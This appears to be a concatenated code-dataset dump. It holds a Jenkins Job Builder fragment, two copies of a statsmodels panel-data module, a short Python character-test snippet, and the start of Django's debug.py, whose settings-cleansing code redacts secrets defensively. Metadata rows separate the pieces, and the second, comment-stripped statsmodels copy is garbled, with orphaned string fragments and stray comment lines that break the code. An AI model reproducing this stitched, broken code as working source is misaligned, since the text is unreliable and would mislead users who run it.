if data.get('disable-pr-notifications', False):
XML.SubElement(
traits, ''.join([
disable_github_status_path_dscore, '.DisableStatusUpdateTrait'
]), {
'plugin': 'disable-github-multibranch-status'
}
)
def build_strategies(xml_parent, data):
basic_build_strategies = 'jenkins.branch.buildstrategies.basic'
bbs = XML.SubElement(xml_parent, 'buildStrategies')
for bbs_list in data.get('build-strategies', None):
if 'tags' in bbs_list:
tags = bbs_list['tags']
tags_elem = XML.SubElement(bbs, ''.join([basic_build_strategies,
'.TagBuildStrategyImpl']), {
'plugin': 'basic-branch-build-strategies',
})
newer_than = -1
if ('ignore-tags-newer-than' in tags and
tags['ignore-tags-newer-than'] >= 0):
newer_than = str(tags['ignore-tags-newer-than'] * 86400000)
XML.SubElement(tags_elem, 'atMostMillis').text = str(newer_than)
older_than = -1
if ('ignore-tags-older-than' in tags and
tags['ignore-tags-older-than'] >= 0):
older_than = str(tags['ignore-tags-older-than'] * 86400000)
XML.SubElement(tags_elem, 'atLeastMillis').text = str(older_than)
if bbs_list.get('regular-branches', False):
XML.SubElement(bbs, ''.join([basic_build_strategies,
'.BranchBuildStrategyImpl']), {
'plugin': 'basic-branch-build-strategies',
})
if 'change-request' in bbs_list:
cr = bbs_list['change-request']
cr_elem = XML.SubElement(bbs, ''.join([basic_build_strategies,
'.ChangeRequestBuildStrategyImpl']), {
'plugin': 'basic-branch-build-strategies',
})
itoc = cr.get('ignore-target-only-changes', False)
XML.SubElement(cr_elem, 'ignoreTargetOnlyChanges').text = (
str(itoc).lower())
if 'named-branches' in bbs_list:
named_branch_elem = XML.SubElement(bbs, ''.join(
[basic_build_strategies, '.NamedBranchBuildStrategyImpl']), {
'plugin': 'basic-branch-build-strategies',
})
filters = XML.SubElement(named_branch_elem, 'filters')
for nb in bbs_list['named-branches']:
if 'exact-name' in nb:
exact_name_elem = XML.SubElement(filters, ''.join(
[basic_build_strategies,
'.NamedBranchBuildStrategyImpl',
'_-ExactNameFilter']))
exact_name_mapping = [
('name', 'name', ''),
('case-sensitive', 'caseSensitive', False)
]
helpers.convert_mapping_to_xml(
exact_name_elem,
nb['exact-name'],
exact_name_mapping,
fail_required=False)
if 'regex-name' in nb:
regex_name_elem = XML.SubElement(filters, ''.join([
basic_build_strategies,
'.NamedBranchBuildStrategyImpl',
'_-RegexNameFilter']))
regex_name_mapping = [
('regex', 'regex', '^.*$'),
('case-sensitive', 'caseSensitive', False)
]
helpers.convert_mapping_to_xml(
regex_name_elem, nb['regex-name'],
regex_name_mapping, fail_required=False)
if 'wildcards-name' in nb:
wildcards_name_elem = XML.SubElement(filters, ''.join([
basic_build_strategies,
'.NamedBranchBuildStrategyImpl',
'_-WildcardsNameFilter']))
wildcards_name_mapping = [
('includes', 'includes', '*'),
('excludes', 'excludes', '')
]
helpers.convert_mapping_to_xml(
wildcards_name_elem,
nb['wildcards-name'],
wildcards_name_mapping,
fail_required=False)
def property_strategies(xml_parent, data):
pbdo_map = collections.OrderedDict([
("max-survivability", "MAX_SURVIVABILITY"),
("performance-optimized", "PERFORMANCE_OPTIMIZED"),
("survivable-nonatomic", "SURVIVABLE_NONATOMIC"),
])
basic_property_strategies = 'jenkins.branch'
workflow_multibranch = 'org.jenkinsci.plugins.workflow.multibranch'
dbps = XML.SubElement(xml_parent, 'strategy', {
'class': ''.join([basic_property_strategies,
'.DefaultBranchPropertyStrategy'])})
prop_strats = data.get('property-strategies', None)
if prop_strats:
props_elem = XML.SubElement(dbps, 'properties', {
'class': 'java.util.Arrays$ArrayList'})
props_elem = XML.SubElement(props_elem, 'a', {
'class': ''.join([
basic_property_strategies, '.BranchProperty-array'])})
for dbs_list in prop_strats.get('all-branches', None):
if dbs_list.get('suppress-scm-triggering', False):
XML.SubElement(props_elem, ''.join([
basic_property_strategies, '.NoTriggerBranchProperty']))
pbdo_val = dbs_list.get(
'pipeline-branch-durability-override', None)
if pbdo_val:
if not pbdo_map.get(pbdo_val):
raise InvalidAttributeError(
'pipeline-branch-durability-override',
pbdo_val,
pbdo_map.keys())
pbdo_elem = XML.SubElement(props_elem, ''.join([
workflow_multibranch, '.DurabilityHintBranchProperty']), {
'plugin': 'workflow-multibranch'})
XML.SubElement(pbdo_elem, 'hint').text = pbdo_map.get(pbdo_val)
| true | true |
1c331b7cfdd6aa03faae6c1b5bc0b4e9acbe92d9 | 14,571 | py | Python | venv/lib/python3.8/site-packages/statsmodels/sandbox/panel/panelmod.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | 6,931 | 2015-01-01T11:41:55.000Z | 2022-03-31T17:03:24.000Z | venv/lib/python3.8/site-packages/statsmodels/sandbox/panel/panelmod.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | 6,137 | 2015-01-01T00:33:45.000Z | 2022-03-31T22:53:17.000Z | venv/lib/python3.8/site-packages/statsmodels/sandbox/panel/panelmod.py | johncollinsai/post-high-frequency-data | 88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4 | [
"MIT"
] | 2,608 | 2015-01-02T21:32:31.000Z | 2022-03-31T07:38:30.000Z | """
Sandbox Panel Estimators
References
-----------
Baltagi, Badi H. `Econometric Analysis of Panel Data.` 4th ed. Wiley, 2008.
"""
from functools import reduce
import numpy as np
from statsmodels.regression.linear_model import GLS
__all__ = ["PanelModel"]
from pandas import Panel
def group(X):
"""
Returns unique numeric values for groups without sorting.
Examples
--------
>>> X = np.array(['a','a','b','c','b','c'])
>>> group(X)
>>> g
array([ 0., 0., 1., 2., 1., 2.])
"""
uniq_dict = {}
group = np.zeros(len(X))
for i in range(len(X)):
if not X[i] in uniq_dict:
uniq_dict.update({X[i] : len(uniq_dict)})
group[i] = uniq_dict[X[i]]
return group
def repanel_cov(groups, sigmas):
'''calculate error covariance matrix for random effects model
Parameters
----------
groups : ndarray, (nobs, nre) or (nobs,)
array of group/category observations
sigma : ndarray, (nre+1,)
array of standard deviations of random effects,
last element is the standard deviation of the
idiosyncratic error
Returns
-------
omega : ndarray, (nobs, nobs)
covariance matrix of error
omegainv : ndarray, (nobs, nobs)
inverse covariance matrix of error
omegainvsqrt : ndarray, (nobs, nobs)
squareroot inverse covariance matrix of error
such that omega = omegainvsqrt * omegainvsqrt.T
Notes
-----
This does not use sparse matrices and constructs nobs by nobs
matrices. Also, omegainvsqrt is not sparse, i.e. elements are non-zero
'''
if groups.ndim == 1:
groups = groups[:,None]
nobs, nre = groups.shape
omega = sigmas[-1]*np.eye(nobs)
for igr in range(nre):
group = groups[:,igr:igr+1]
groupuniq = np.unique(group)
dummygr = sigmas[igr] * (group == groupuniq).astype(float)
omega += np.dot(dummygr, dummygr.T)
ev, evec = np.linalg.eigh(omega) #eig does not work
omegainv = np.dot(evec, (1/ev * evec).T)
omegainvhalf = evec/np.sqrt(ev)
return omega, omegainv, omegainvhalf
class PanelData(Panel):
pass
class PanelModel(object):
"""
An abstract statistical model class for panel (longitudinal) datasets.
Parameters
----------
endog : array_like or str
If a pandas object is used then endog should be the name of the
endogenous variable as a string.
# exog
# panel_arr
# time_arr
panel_data : pandas.Panel object
Notes
-----
If a pandas object is supplied it is assumed that the major_axis is time
and that the minor_axis has the panel variable.
"""
def __init__(self, endog=None, exog=None, panel=None, time=None,
xtnames=None, equation=None, panel_data=None):
if panel_data is None:
# if endog == None and exog == None and panel == None and \
# time == None:
# raise ValueError("If pandel_data is False then endog, exog, \
#panel_arr, and time_arr cannot be None.")
self.initialize(endog, exog, panel, time, xtnames, equation)
# elif aspandas != False:
# if not isinstance(endog, str):
# raise ValueError("If a pandas object is supplied then endog \
#must be a string containing the name of the endogenous variable")
# if not isinstance(aspandas, Panel):
# raise ValueError("Only pandas.Panel objects are supported")
# self.initialize_pandas(endog, aspandas, panel_name)
def initialize(self, endog, exog, panel, time, xtnames, equation):
"""
Initialize plain array model.
See PanelModel
"""
#TODO: for now, we are going assume a constant, and then make the first
#panel the base, add a flag for this....
# get names
names = equation.split(" ")
self.endog_name = names[0]
exog_names = names[1:] # this makes the order matter in the array
self.panel_name = xtnames[0]
self.time_name = xtnames[1]
novar = exog.var(0) == 0
if True in novar:
cons_index = np.where(novar == 1)[0][0] # constant col. num
exog_names.insert(cons_index, 'cons')
self._cons_index = novar # used again in fit_fixed
self.exog_names = exog_names
self.endog = np.squeeze(np.asarray(endog))
exog = np.asarray(exog)
self.exog = exog
self.panel = np.asarray(panel)
self.time = np.asarray(time)
self.paneluniq = np.unique(panel)
self.timeuniq = np.unique(time)
#TODO: this structure can possibly be extracted somewhat to deal with
#names in general
#TODO: add some dimension checks, etc.
# def initialize_pandas(self, endog, aspandas):
# """
# Initialize pandas objects.
#
# See PanelModel.
# """
# self.aspandas = aspandas
# endog = aspandas[endog].values
# self.endog = np.squeeze(endog)
# exog_name = aspandas.columns.tolist()
# exog_name.remove(endog)
# self.exog = aspandas.filterItems(exog_name).values
#TODO: can the above be simplified to slice notation?
# if panel_name != None:
# self.panel_name = panel_name
# self.exog_name = exog_name
# self.endog_name = endog
# self.time_arr = aspandas.major_axis
#TODO: is time always handled correctly in fromRecords?
# self.panel_arr = aspandas.minor_axis
#TODO: all of this might need to be refactored to explicitly rely (internally)
# on the pandas LongPanel structure for speed and convenience.
# not sure this part is finished...
#TODO: does not conform to new initialize
def initialize_pandas(self, panel_data, endog_name, exog_name):
self.panel_data = panel_data
endog = panel_data[endog_name].values # does this create a copy?
self.endog = np.squeeze(endog)
if exog_name is None:
exog_name = panel_data.columns.tolist()
exog_name.remove(endog_name)
self.exog = panel_data.filterItems(exog_name).values # copy?
self._exog_name = exog_name
self._endog_name = endog_name
self._timeseries = panel_data.major_axis # might not need these
self._panelseries = panel_data.minor_axis
#TODO: this could be pulled out and just have a by kwd that takes
# the panel or time array
#TODO: this also needs to be expanded for 'twoway'
def _group_mean(self, X, index='oneway', counts=False, dummies=False):
"""
Get group means of X by time or by panel.
index default is panel
"""
if index == 'oneway':
Y = self.panel
uniq = self.paneluniq
elif index == 'time':
Y = self.time
uniq = self.timeuniq
else:
raise ValueError("index %s not understood" % index)
print(Y, uniq, uniq[:,None], len(Y), len(uniq), len(uniq[:,None]),
index)
#TODO: use sparse matrices
dummy = (Y == uniq[:,None]).astype(float)
if X.ndim > 1:
mean = np.dot(dummy,X)/dummy.sum(1)[:,None]
else:
mean = np.dot(dummy,X)/dummy.sum(1)
if counts is False and dummies is False:
return mean
elif counts is True and dummies is False:
return mean, dummy.sum(1)
elif counts is True and dummies is True:
return mean, dummy.sum(1), dummy
elif counts is False and dummies is True:
return mean, dummy
#TODO: Use kwd arguments or have fit_method methods?
def fit(self, model=None, method=None, effects='oneway'):
"""
method : LSDV, demeaned, MLE, GLS, BE, FE, optional
model :
between
fixed
random
pooled
[gmm]
effects :
oneway
time
twoway
femethod : demeaned (only one implemented)
WLS
remethod :
swar -
amemiya
nerlove
walhus
Notes
-----
This is unfinished. None of the method arguments work yet.
Only oneway effects should work.
"""
if method: # get rid of this with default
method = method.lower()
model = model.lower()
if method and method not in ["lsdv", "demeaned", "mle",
"gls", "be", "fe"]:
# get rid of if method with default
raise ValueError("%s not a valid method" % method)
# if method == "lsdv":
# self.fit_lsdv(model)
if model == 'pooled':
return GLS(self.endog, self.exog).fit()
if model == 'between':
return self._fit_btwn(method, effects)
if model == 'fixed':
return self._fit_fixed(method, effects)
# def fit_lsdv(self, effects):
# """
# Fit using least squares dummy variables.
#
# Notes
# -----
# Should only be used for small `nobs`.
# """
# pdummies = None
# tdummies = None
def _fit_btwn(self, method, effects):
# group mean regression or WLS
if effects != "twoway":
endog = self._group_mean(self.endog, index=effects)
exog = self._group_mean(self.exog, index=effects)
else:
raise ValueError("%s effects is not valid for the between "
"estimator" % effects)
befit = GLS(endog, exog).fit()
return befit
def _fit_fixed(self, method, effects):
endog = self.endog
exog = self.exog
demeantwice = False
if effects in ["oneway","twoways"]:
if effects == "twoways":
demeantwice = True
effects = "oneway"
endog_mean, counts = self._group_mean(endog, index=effects,
counts=True)
exog_mean = self._group_mean(exog, index=effects)
counts = counts.astype(int)
endog = endog - np.repeat(endog_mean, counts)
exog = exog - np.repeat(exog_mean, counts, axis=0)
if demeantwice or effects == "time":
endog_mean, dummies = self._group_mean(endog, index="time",
dummies=True)
exog_mean = self._group_mean(exog, index="time")
# This allows unbalanced panels
endog = endog - np.dot(endog_mean, dummies)
exog = exog - np.dot(dummies.T, exog_mean)
fefit = GLS(endog, exog[:,-self._cons_index]).fit()
#TODO: might fail with one regressor
return fefit
class SURPanel(PanelModel):
pass
class SEMPanel(PanelModel):
pass
class DynamicPanel(PanelModel):
pass
if __name__ == "__main__":
import numpy.lib.recfunctions as nprf
import pandas
from pandas import Panel
import statsmodels.api as sm
data = sm.datasets.grunfeld.load()
# Baltagi does not include American Steel
endog = data.endog[:-20]
fullexog = data.exog[:-20]
# fullexog.sort(order=['firm','year'])
panel_arr = nprf.append_fields(fullexog, 'investment', endog, float,
usemask=False)
panel_df = pandas.DataFrame(panel_arr)
panel_panda = panel_df.set_index(['year', 'firm']).to_panel()
# the most cumbersome way of doing it as far as preprocessing by hand
exog = fullexog[['value','capital']].view(float).reshape(-1,2)
exog = sm.add_constant(exog, prepend=False)
panel = group(fullexog['firm'])
year = fullexog['year']
panel_mod = PanelModel(endog, exog, panel, year, xtnames=['firm','year'],
equation='invest value capital')
# note that equation does not actually do anything but name the variables
panel_ols = panel_mod.fit(model='pooled')
panel_be = panel_mod.fit(model='between', effects='oneway')
panel_fe = panel_mod.fit(model='fixed', effects='oneway')
panel_bet = panel_mod.fit(model='between', effects='time')
panel_fet = panel_mod.fit(model='fixed', effects='time')
panel_fe2 = panel_mod.fit(model='fixed', effects='twoways')
#see also Baltagi (3rd edt) 3.3 THE RANDOM EFFECTS MODEL p.35
#for explicit formulas for spectral decomposition
#but this works also for unbalanced panel
#
#I also just saw: 9.4.2 The Random Effects Model p.176 which is
#partially almost the same as I did
#
#this needs to use sparse matrices for larger datasets
#
#"""
#
#import numpy as np
#
groups = np.array([0,0,0,1,1,2,2,2])
nobs = groups.shape[0]
groupuniq = np.unique(groups)
periods = np.array([0,1,2,1,2,0,1,2])
perioduniq = np.unique(periods)
dummygr = (groups[:,None] == groupuniq).astype(float)
dummype = (periods[:,None] == perioduniq).astype(float)
sigma = 1.
sigmagr = np.sqrt(2.)
sigmape = np.sqrt(3.)
#dummyall = np.c_[sigma*np.ones((nobs,1)), sigmagr*dummygr,
# sigmape*dummype]
#exclude constant ?
dummyall = np.c_[sigmagr*dummygr, sigmape*dummype]
# omega is the error variance-covariance matrix for the stacked
# observations
omega = np.dot(dummyall, dummyall.T) + sigma* np.eye(nobs)
print(omega)
print(np.linalg.cholesky(omega))
ev, evec = np.linalg.eigh(omega) #eig does not work
omegainv = np.dot(evec, (1/ev * evec).T)
omegainv2 = np.linalg.inv(omega)
omegacomp = np.dot(evec, (ev * evec).T)
print(np.max(np.abs(omegacomp - omega)))
#check
#print(np.dot(omegainv,omega)
print(np.max(np.abs(np.dot(omegainv,omega) - np.eye(nobs))))
omegainvhalf = evec/np.sqrt(ev) #not sure whether ev should not be column
print(np.max(np.abs(np.dot(omegainvhalf,omegainvhalf.T) - omegainv)))
# now we can use omegainvhalf in GLS (instead of the cholesky)
sigmas2 = np.array([sigmagr, sigmape, sigma])
groups2 = np.column_stack((groups, periods))
omega_, omegainv_, omegainvhalf_ = repanel_cov(groups2, sigmas2)
print(np.max(np.abs(omega_ - omega)))
print(np.max(np.abs(omegainv_ - omegainv)))
print(np.max(np.abs(omegainvhalf_ - omegainvhalf)))
# notation Baltagi (3rd) section 9.4.1 (Fixed Effects Model)
Pgr = reduce(np.dot,[dummygr,
np.linalg.inv(np.dot(dummygr.T, dummygr)),dummygr.T])
Qgr = np.eye(nobs) - Pgr
# within group effect: np.dot(Qgr, groups)
# but this is not memory efficient, compared to groupstats
print(np.max(np.abs(np.dot(Qgr, groups))))
| 32.966063 | 78 | 0.606135 | from functools import reduce
import numpy as np
from statsmodels.regression.linear_model import GLS
__all__ = ["PanelModel"]
from pandas import Panel
def group(X):
uniq_dict = {}
group = np.zeros(len(X))
for i in range(len(X)):
if not X[i] in uniq_dict:
uniq_dict.update({X[i] : len(uniq_dict)})
group[i] = uniq_dict[X[i]]
return group
def repanel_cov(groups, sigmas):
if groups.ndim == 1:
groups = groups[:,None]
nobs, nre = groups.shape
omega = sigmas[-1]*np.eye(nobs)
for igr in range(nre):
group = groups[:,igr:igr+1]
groupuniq = np.unique(group)
dummygr = sigmas[igr] * (group == groupuniq).astype(float)
omega += np.dot(dummygr, dummygr.T)
ev, evec = np.linalg.eigh(omega)
omegainv = np.dot(evec, (1/ev * evec).T)
omegainvhalf = evec/np.sqrt(ev)
return omega, omegainv, omegainvhalf
class PanelData(Panel):
pass
class PanelModel(object):
def __init__(self, endog=None, exog=None, panel=None, time=None,
xtnames=None, equation=None, panel_data=None):
if panel_data is None:
#panel_arr, and time_arr cannot be None.")
self.initialize(endog, exog, panel, time, xtnames, equation)
#must be a string containing the name of the endogenous variable")
def initialize(self, endog, exog, panel, time, xtnames, equation):
names = equation.split(" ")
self.endog_name = names[0]
exog_names = names[1:]
self.panel_name = xtnames[0]
self.time_name = xtnames[1]
novar = exog.var(0) == 0
if True in novar:
cons_index = np.where(novar == 1)[0][0]
exog_names.insert(cons_index, 'cons')
self._cons_index = novar
self.exog_names = exog_names
self.endog = np.squeeze(np.asarray(endog))
exog = np.asarray(exog)
self.exog = exog
self.panel = np.asarray(panel)
self.time = np.asarray(time)
self.paneluniq = np.unique(panel)
self.timeuniq = np.unique(time)
# Initialize pandas objects.
#
# See PanelModel.
# """
def initialize_pandas(self, panel_data, endog_name, exog_name):
self.panel_data = panel_data
endog = panel_data[endog_name].values
self.endog = np.squeeze(endog)
if exog_name is None:
exog_name = panel_data.columns.tolist()
exog_name.remove(endog_name)
self.exog = panel_data.filterItems(exog_name).values
self._exog_name = exog_name
self._endog_name = endog_name
self._timeseries = panel_data.major_axis
self._panelseries = panel_data.minor_axis
def _group_mean(self, X, index='oneway', counts=False, dummies=False):
if index == 'oneway':
Y = self.panel
uniq = self.paneluniq
elif index == 'time':
Y = self.time
uniq = self.timeuniq
else:
raise ValueError("index %s not understood" % index)
print(Y, uniq, uniq[:,None], len(Y), len(uniq), len(uniq[:,None]),
index)
dummy = (Y == uniq[:,None]).astype(float)
if X.ndim > 1:
mean = np.dot(dummy,X)/dummy.sum(1)[:,None]
else:
mean = np.dot(dummy,X)/dummy.sum(1)
if counts is False and dummies is False:
return mean
elif counts is True and dummies is False:
return mean, dummy.sum(1)
elif counts is True and dummies is True:
return mean, dummy.sum(1), dummy
elif counts is False and dummies is True:
return mean, dummy
def fit(self, model=None, method=None, effects='oneway'):
if method:
method = method.lower()
model = model.lower()
if method and method not in ["lsdv", "demeaned", "mle",
"gls", "be", "fe"]:
raise ValueError("%s not a valid method" % method)
if model == 'pooled':
return GLS(self.endog, self.exog).fit()
if model == 'between':
return self._fit_btwn(method, effects)
if model == 'fixed':
return self._fit_fixed(method, effects)
# Fit using least squares dummy variables.
#
# Notes
# -----
# Should only be used for small `nobs`.
# """
def _fit_btwn(self, method, effects):
if effects != "twoway":
endog = self._group_mean(self.endog, index=effects)
exog = self._group_mean(self.exog, index=effects)
else:
raise ValueError("%s effects is not valid for the between "
"estimator" % effects)
befit = GLS(endog, exog).fit()
return befit
def _fit_fixed(self, method, effects):
endog = self.endog
exog = self.exog
demeantwice = False
if effects in ["oneway","twoways"]:
if effects == "twoways":
demeantwice = True
effects = "oneway"
endog_mean, counts = self._group_mean(endog, index=effects,
counts=True)
exog_mean = self._group_mean(exog, index=effects)
counts = counts.astype(int)
endog = endog - np.repeat(endog_mean, counts)
exog = exog - np.repeat(exog_mean, counts, axis=0)
if demeantwice or effects == "time":
endog_mean, dummies = self._group_mean(endog, index="time",
dummies=True)
exog_mean = self._group_mean(exog, index="time")
endog = endog - np.dot(endog_mean, dummies)
exog = exog - np.dot(dummies.T, exog_mean)
fefit = GLS(endog, exog[:,-self._cons_index]).fit()
return fefit
class SURPanel(PanelModel):
pass
class SEMPanel(PanelModel):
pass
class DynamicPanel(PanelModel):
pass
if __name__ == "__main__":
import numpy.lib.recfunctions as nprf
import pandas
from pandas import Panel
import statsmodels.api as sm
data = sm.datasets.grunfeld.load()
endog = data.endog[:-20]
fullexog = data.exog[:-20]
panel_arr = nprf.append_fields(fullexog, 'investment', endog, float,
usemask=False)
panel_df = pandas.DataFrame(panel_arr)
panel_panda = panel_df.set_index(['year', 'firm']).to_panel()
exog = fullexog[['value','capital']].view(float).reshape(-1,2)
exog = sm.add_constant(exog, prepend=False)
panel = group(fullexog['firm'])
year = fullexog['year']
panel_mod = PanelModel(endog, exog, panel, year, xtnames=['firm','year'],
equation='invest value capital')
panel_ols = panel_mod.fit(model='pooled')
panel_be = panel_mod.fit(model='between', effects='oneway')
panel_fe = panel_mod.fit(model='fixed', effects='oneway')
panel_bet = panel_mod.fit(model='between', effects='time')
panel_fet = panel_mod.fit(model='fixed', effects='time')
panel_fe2 = panel_mod.fit(model='fixed', effects='twoways')
#
#import numpy as np
#
groups = np.array([0,0,0,1,1,2,2,2])
nobs = groups.shape[0]
groupuniq = np.unique(groups)
periods = np.array([0,1,2,1,2,0,1,2])
perioduniq = np.unique(periods)
dummygr = (groups[:,None] == groupuniq).astype(float)
dummype = (periods[:,None] == perioduniq).astype(float)
sigma = 1.
sigmagr = np.sqrt(2.)
sigmape = np.sqrt(3.)
#dummyall = np.c_[sigma*np.ones((nobs,1)), sigmagr*dummygr,
# sigmape*dummype]
#exclude constant ?
dummyall = np.c_[sigmagr*dummygr, sigmape*dummype]
# omega is the error variance-covariance matrix for the stacked
# observations
omega = np.dot(dummyall, dummyall.T) + sigma* np.eye(nobs)
print(omega)
print(np.linalg.cholesky(omega))
ev, evec = np.linalg.eigh(omega) #eig does not work
omegainv = np.dot(evec, (1/ev * evec).T)
omegainv2 = np.linalg.inv(omega)
omegacomp = np.dot(evec, (ev * evec).T)
print(np.max(np.abs(omegacomp - omega)))
#check
#print(np.dot(omegainv,omega)
print(np.max(np.abs(np.dot(omegainv,omega) - np.eye(nobs))))
omegainvhalf = evec/np.sqrt(ev) #not sure whether ev should not be column
print(np.max(np.abs(np.dot(omegainvhalf,omegainvhalf.T) - omegainv)))
# now we can use omegainvhalf in GLS (instead of the cholesky)
sigmas2 = np.array([sigmagr, sigmape, sigma])
groups2 = np.column_stack((groups, periods))
omega_, omegainv_, omegainvhalf_ = repanel_cov(groups2, sigmas2)
print(np.max(np.abs(omega_ - omega)))
print(np.max(np.abs(omegainv_ - omegainv)))
print(np.max(np.abs(omegainvhalf_ - omegainvhalf)))
# notation Baltagi (3rd) section 9.4.1 (Fixed Effects Model)
Pgr = reduce(np.dot,[dummygr,
np.linalg.inv(np.dot(dummygr.T, dummygr)),dummygr.T])
Qgr = np.eye(nobs) - Pgr
# within group effect: np.dot(Qgr, groups)
# but this is not memory efficient, compared to groupstats
print(np.max(np.abs(np.dot(Qgr, groups))))
| true | true |
1c331bf1d66060169113b764d33287441ab11a06 | 139 | py | Python | InClass/Day24/05.py | walkingtyphoon/Python-workspace | e872bce82b2bac3dd5d809f8576345ccc1c6afb7 | [
"Apache-2.0"
] | null | null | null | InClass/Day24/05.py | walkingtyphoon/Python-workspace | e872bce82b2bac3dd5d809f8576345ccc1c6afb7 | [
"Apache-2.0"
] | null | null | null | InClass/Day24/05.py | walkingtyphoon/Python-workspace | e872bce82b2bac3dd5d809f8576345ccc1c6afb7 | [
"Apache-2.0"
] | null | null | null | value = input("请输入你需要辨别的字符:")
print(value.isdigit())
# 判断是否为数字
print(value.isalpha())
# 判断是否为字母
print(value.isspace())
# 判断是否为空格或者是制表符,空格
| 15.444444 | 29 | 0.726619 | value = input("请输入你需要辨别的字符:")
print(value.isdigit())
print(value.isalpha())
print(value.isspace())
| true | true |
1c331d68032e12d278f28e029f665df346a53f5d | 42,579 | py | Python | django/views/debug.py | skyl/django | 843e7450ddcb820b2bdc6d47d6c4aab9820a46c4 | [
"BSD-3-Clause"
] | 1 | 2021-11-22T17:41:19.000Z | 2021-11-22T17:41:19.000Z | django/views/debug.py | skyl/django | 843e7450ddcb820b2bdc6d47d6c4aab9820a46c4 | [
"BSD-3-Clause"
] | null | null | null | django/views/debug.py | skyl/django | 843e7450ddcb820b2bdc6d47d6c4aab9820a46c4 | [
"BSD-3-Clause"
] | 1 | 2020-06-03T07:55:20.000Z | 2020-06-03T07:55:20.000Z | from __future__ import unicode_literals
import datetime
import os
import re
import sys
import types
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.http import (HttpResponse, HttpResponseServerError,
HttpResponseNotFound, HttpRequest, build_request_repr)
from django.template import Template, Context, TemplateDoesNotExist
from django.template.defaultfilters import force_escape, pprint
from django.utils.html import escape
from django.utils.encoding import force_bytes, smart_text
from django.utils.module_loading import import_by_path
from django.utils import six
HIDDEN_SETTINGS = re.compile('API|TOKEN|KEY|SECRET|PASS|PROFANITIES_LIST|SIGNATURE')
CLEANSED_SUBSTITUTE = '********************'
def linebreak_iter(template_source):
yield 0
p = template_source.find('\n')
while p >= 0:
yield p+1
p = template_source.find('\n', p+1)
yield len(template_source) + 1
def cleanse_setting(key, value):
"""Cleanse an individual setting key/value of sensitive content.
If the value is a dictionary, recursively cleanse the keys in
that dictionary.
"""
try:
if HIDDEN_SETTINGS.search(key):
cleansed = CLEANSED_SUBSTITUTE
else:
if isinstance(value, dict):
cleansed = dict((k, cleanse_setting(k, v)) for k,v in value.items())
else:
cleansed = value
except TypeError:
# If the key isn't regex-able, just return as-is.
cleansed = value
return cleansed
def get_safe_settings():
"Returns a dictionary of the settings module, with sensitive settings blurred out."
settings_dict = {}
for k in dir(settings):
if k.isupper():
settings_dict[k] = cleanse_setting(k, getattr(settings, k))
return settings_dict
def technical_500_response(request, exc_type, exc_value, tb):
"""
Create a technical server error response. The last three arguments are
the values returned from sys.exc_info() and friends.
"""
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
if request.is_ajax():
text = reporter.get_traceback_text()
return HttpResponseServerError(text, content_type='text/plain')
else:
html = reporter.get_traceback_html()
return HttpResponseServerError(html, content_type='text/html')
# Cache for the default exception reporter filter instance.
default_exception_reporter_filter = None
def get_exception_reporter_filter(request):
global default_exception_reporter_filter
if default_exception_reporter_filter is None:
# Load the default filter for the first time and cache it.
default_exception_reporter_filter = import_by_path(
settings.DEFAULT_EXCEPTION_REPORTER_FILTER)()
if request:
return getattr(request, 'exception_reporter_filter', default_exception_reporter_filter)
else:
return default_exception_reporter_filter
class ExceptionReporterFilter(object):
"""
Base for all exception reporter filter classes. All overridable hooks
contain lenient default behaviors.
"""
def get_request_repr(self, request):
if request is None:
return repr(None)
else:
return build_request_repr(request, POST_override=self.get_post_parameters(request))
def get_post_parameters(self, request):
if request is None:
return {}
else:
return request.POST
def get_traceback_frame_variables(self, request, tb_frame):
return list(six.iteritems(tb_frame.f_locals))
class SafeExceptionReporterFilter(ExceptionReporterFilter):
"""
Use annotations made by the sensitive_post_parameters and
sensitive_variables decorators to filter out sensitive information.
"""
def is_active(self, request):
"""
This filter is to add safety in production environments (i.e. DEBUG
is False). If DEBUG is True then your site is not safe anyway.
This hook is provided as a convenience to easily activate or
deactivate the filter on a per request basis.
"""
return settings.DEBUG is False
def get_post_parameters(self, request):
"""
Replaces the values of POST parameters marked as sensitive with
stars (*********).
"""
if request is None:
return {}
else:
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
cleansed = request.POST.copy()
if sensitive_post_parameters == '__ALL__':
# Cleanse all parameters.
for k, v in cleansed.items():
cleansed[k] = CLEANSED_SUBSTITUTE
return cleansed
else:
# Cleanse only the specified parameters.
for param in sensitive_post_parameters:
if param in cleansed:
cleansed[param] = CLEANSED_SUBSTITUTE
return cleansed
else:
return request.POST
def get_traceback_frame_variables(self, request, tb_frame):
"""
Replaces the values of variables marked as sensitive with
stars (*********).
"""
# Loop through the frame's callers to see if the sensitive_variables
# decorator was used.
current_frame = tb_frame.f_back
sensitive_variables = None
while current_frame is not None:
if (current_frame.f_code.co_name == 'sensitive_variables_wrapper'
and 'sensitive_variables_wrapper' in current_frame.f_locals):
# The sensitive_variables decorator was used, so we take note
# of the sensitive variables' names.
wrapper = current_frame.f_locals['sensitive_variables_wrapper']
sensitive_variables = getattr(wrapper, 'sensitive_variables', None)
break
current_frame = current_frame.f_back
cleansed = {}
if self.is_active(request) and sensitive_variables:
if sensitive_variables == '__ALL__':
# Cleanse all variables
for name, value in tb_frame.f_locals.items():
cleansed[name] = CLEANSED_SUBSTITUTE
else:
# Cleanse specified variables
for name, value in tb_frame.f_locals.items():
if name in sensitive_variables:
value = CLEANSED_SUBSTITUTE
elif isinstance(value, HttpRequest):
# Cleanse the request's POST parameters.
value = self.get_request_repr(value)
cleansed[name] = value
else:
# Potentially cleanse only the request if it's one of the frame variables.
for name, value in tb_frame.f_locals.items():
if isinstance(value, HttpRequest):
# Cleanse the request's POST parameters.
value = self.get_request_repr(value)
cleansed[name] = value
if (tb_frame.f_code.co_name == 'sensitive_variables_wrapper'
and 'sensitive_variables_wrapper' in tb_frame.f_locals):
# For good measure, obfuscate the decorated function's arguments in
# the sensitive_variables decorator's frame, in case the variables
# associated with those arguments were meant to be obfuscated from
# the decorated function's frame.
cleansed['func_args'] = CLEANSED_SUBSTITUTE
cleansed['func_kwargs'] = CLEANSED_SUBSTITUTE
return cleansed.items()
class ExceptionReporter(object):
"""
A class to organize and coordinate reporting on exceptions.
"""
